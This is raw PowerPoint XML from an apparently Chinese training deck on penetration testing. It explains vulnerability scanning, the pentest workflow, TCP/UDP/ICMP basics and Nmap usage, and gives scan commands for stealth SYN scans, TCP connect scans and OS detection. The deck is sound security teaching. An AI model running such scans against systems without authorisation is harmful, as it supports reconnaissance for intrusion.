              <a:t>       漏洞扫描技术是一类重要的网络安全技术。它和防火墙、入侵检测系统互相配合，能够有效提高网络的安全性。通过对网络的扫描，网络管理员能了解网络的安全设置和运行的应用服务，及时发现安全漏洞，客观评估网络风险等级。网络管理员能根据扫描的结果更正网络安全漏洞和系统中的错误设置，在黑客攻击前进行防范。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="322" name="Shape 322"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4971304" y="3685711"/>
            <a:ext cx="19431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内容概要</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="323" name="Shape 323"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5711180" y="4635498"/>
            <a:ext cx="4329015" cy="952501"/>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marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>joomscan</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="281876" indent="-281876" algn="l" defTabSz="369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:buSzPct val="75000"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>WPScan</a:t>
            </a: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4" name="Shape 154"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038890" y="7272510"/>
            <a:ext cx="10927020" cy="5613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l" defTabSz="914400">
              <a:defRPr sz="2600">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>信息</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>侦察  －&gt;   </a:t>
            </a:r>
            <a:r>
              <a:t>漏洞</a:t>
            </a:r>
            <a:r>
              <a:rPr>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>扫描  －&gt;   漏洞利用</a:t>
            </a:r>
            <a:r>
              <a:t>  －&gt;   维持访问  －&gt;   编写报告</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="155" name="Shape 155"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="914400" y="863599"/>
            <a:ext cx="2870200"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914400">
              <a:defRPr sz="3100">
                <a:latin typeface="黑体"/>
                <a:ea typeface="黑体"/>
                <a:cs typeface="黑体"/>
                <a:sym typeface="黑体"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>渗透测试的流程</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="156" name="image4.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1038890" y="2056438"/>
            <a:ext cx="10927020" cy="3984920"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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5" name="Shape 325"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5344583" y="459913"/>
            <a:ext cx="1689101"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3100">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>网络流量</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="326" name="Shape 326"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="685798" y="1600200"/>
            <a:ext cx="5249617"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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>网络流量就是网络上传输的数据量。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="327" name="Shape 327"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="634998" y="2638887"/>
            <a:ext cx="138430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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>TCP协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="328" name="Shape 328"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="642936" y="3220375"/>
            <a:ext cx="11718928" cy="193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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>TCP是因特网中的传输层协议，使用三次握手协议建立连接。当主动方发出SYN连接请求后，等待对方回答SYN+ACK ，并最终对对方的 SYN 执行 ACK 确认。这种建立连接的方法可以防止产生错误的连接，TCP使用的流量控制协议是可变大小的滑动窗口协议。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="329" name="Shape 329"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="447192" y="5465562"/>
            <a:ext cx="6383361" cy="3276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1" sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>连接建立</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>TCP三次握手的过程如下：</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>（1）客户端发送SYN（SEQ=x）报文给服务器端，进入SYN_SEND状态。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>（2）服务器端收到SYN报文，回应一个SYN （SEQ=y）ACK(ACK=x+1）报文，进入SYN_RECV状态。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>（3）客户端收到服务器端的SYN报文，回应一个ACK(ACK=y+1）报文，进入Established状态。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>三次握手完成，TCP客户端和服务器端成功地建立连接，可以开始传输数据了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="330" name="image41.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7051657" y="4794432"/>
            <a:ext cx="5400838" cy="4618864"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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2" name="Shape 332"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="257650" y="698499"/>
            <a:ext cx="6334012" cy="518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1" sz="1800">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:pPr>
            <a:r>
              <a:t>连接终止</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>建立一个连接需要三次握手，而终止一个连接要经过四次握手，这是由TCP的半关闭（half-close）造成的。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>(1) 某个应用进程首先调用close，称该端执行“主动关闭”（active close）该端的TCP于是发送一个FIN分节，表示数据发送完毕。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>(2) 接收到这个FIN的对端执行 “被动关闭”（passive close），这个FIN由TCP确认。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>注意：FIN的接收也作为一个文件结束符（end-of-file）传递给接收端应用进程，放在已排队等候该应用进程接收的任何其他数据之后，因为，FIN的接收意味着接收端应用进程在相应连接上再无额外数据可接收。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>(3) 一段时间后，接收到这个文件结束符的应用进程将调用close关闭它的套接字。这导致它的TCP也发送一个FIN。</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:defRPr sz="1800"/>
            </a:pPr>
            <a:r>
              <a:t>(4) 接收这个最终FIN的原发送端TCP（即执行主动关闭的那一端）确认这个FIN。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="333" name="image42.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7009965" y="788547"/>
            <a:ext cx="4808833" cy="4501886"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="334" name="Shape 334"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="350625" y="6525087"/>
            <a:ext cx="1419648"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>UDP协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="335" name="Shape 335"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385042" y="7162799"/>
            <a:ext cx="11498116" cy="2006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200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>UDP协议全称是用户数据报协议  ，在网络中它与TCP协议一样用于处理数据包，是一种无连接的协议。在OSI模型中，在第四层——传输层，处于IP协议的上一层。UDP有不提供数据包分组、组装和不能对数据包进行排序的缺点，也就是说，当报文发送之后，是无法得知其是否安全完整到达的。UDP用来支持那些需要在计算机之间传输数据的网络应用。包括网络视频会议系统在内的众多的客户/服务器模式的网络应用都需要使用UDP协议。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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7" name="Shape 337"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="520698" y="1295399"/>
            <a:ext cx="11963403" cy="172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300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ICMP是（Internet Control Message Protocol）Internet控制报文协议。它是TCP/IP协议族的一个子协议，用于在IP主机、路由器之间传递控制消息。控制消息是指网络通不通、主机是否可达、路由是否可用等网络本身的消息。这些控制消息虽然并不传输用户数据，但是对于用户数据的传递起着重要的作用。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="338" name="Shape 338"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="504823" y="454486"/>
            <a:ext cx="154305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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>ICMP协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="339" name="image43.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468656" y="3482521"/>
            <a:ext cx="10322485" cy="4876537"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="340" name="Shape 340"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="933450" y="8548276"/>
            <a:ext cx="4382770"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ping命令使用的就是ICMP协议</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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2" name="Shape 342"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4972050" y="459911"/>
            <a:ext cx="1419833"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369506">
              <a:spcBef>
                <a:spcPts val="2500"/>
              </a:spcBef>
              <a:defRPr b="1" sz="3700">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nmap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="343" name="Shape 343"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="647698" y="1244600"/>
            <a:ext cx="11406727" cy="1473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500"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>Nmap在渗透测试中经常用到，它不仅可以用来确定目标网络上计算机的存活状态，而且可以扫描各个计算机的操作系统、开放端口、服务，还有可能获得用户的证书。熟练掌握Nmap的用法，可以极大的提高渗透测试技术。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="344" name="Shape 344"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="749298" y="3213099"/>
            <a:ext cx="138430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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>命令结构</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="345" name="Shape 345"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2686718" y="3251199"/>
            <a:ext cx="7631362"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sS -T2 -p 1-500 192.168.1.1 -oN metscan.txt</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="346" name="Shape 346"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="628467" y="4063999"/>
            <a:ext cx="11747866" cy="162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200"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap 命令后跟的是扫描类型，第一个参数sS代表隐蔽扫描，第二个参数T2是timing选项，设置了nmap扫描时的速度、流量；第三个参数-p设置了需要扫描的端口，后面的192.168.1.1是扫描目标，可以是ip地址，也可以设置为网段地址；扫描目标后跟着输出选项，可以将扫描结果保存成文件，供测试人员分析。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="347" name="Shape 347"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="469900" y="6261100"/>
            <a:ext cx="1943100"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实例应用</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="348" name="Shape 348"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="548180" y="7150100"/>
            <a:ext cx="11605763"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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>识别系统、TCP扫描、SYN 扫描、ACK扫描、UDP 扫描... …</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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0" name="Shape 350"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838198" y="279399"/>
            <a:ext cx="138430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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>识别系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="351" name="Shape 351"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2834929" y="317499"/>
            <a:ext cx="272484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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -O -Pn  URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="352" name="image44.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="694191" y="1282413"/>
            <a:ext cx="11616417" cy="6116400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="353" name="Shape 353"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="695959" y="8115300"/>
            <a:ext cx="489458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vl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>图中结果显示为Windows操作系统</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="354" name="Shape 354"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="897421" y="759356"/>
            <a:ext cx="7006258"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200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>-Pn 禁用Nmap网络发现功能，假定所有系统都是活动的</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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6" name="Shape 356"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="831849" y="279399"/>
            <a:ext cx="836930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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>TCP扫描（端口扫描中最稳定的，利用的是TCP三次握手）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="357" name="Shape 357"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="931650" y="1447800"/>
            <a:ext cx="2848398"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500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>nmap -sT -Pn  URI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="358" name="Shape 358"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="857249" y="888999"/>
            <a:ext cx="11733455"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300"/>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>TCP扫描通常用于收集有关目标的更多信息，但是会和目标主机建立一个完成的TCP连接。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="359" name="image45.png"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:extLst/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="940557" y="2408158"/>
            <a:ext cx="10590287" cy="3337084"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="360" name="Shape 360"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="944721" y="6057899"/>
            <a:ext cx="5565458"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图中结果显示开放了telnet、http等服务</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="361" name="Shape 361"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1008109" y="7353300"/>
            <a:ext cx="7139137"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200">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>-sT TCP连接扫描（s=&gt;哪种类型扫描？ ==&gt;t TCP类型）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
  <p:transition xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" spd="med" advClick="1" p14:dur="1000"/>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3" name="Shape 363"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="804229" y="266699"/>
            <a:ext cx="932211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2500">
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr/>
            <a:r>
              <a:t>SYN 扫描：TCP两次握手（隐藏扫描，速度快，nmap缺省参数）</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="364" name="Shape 364"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
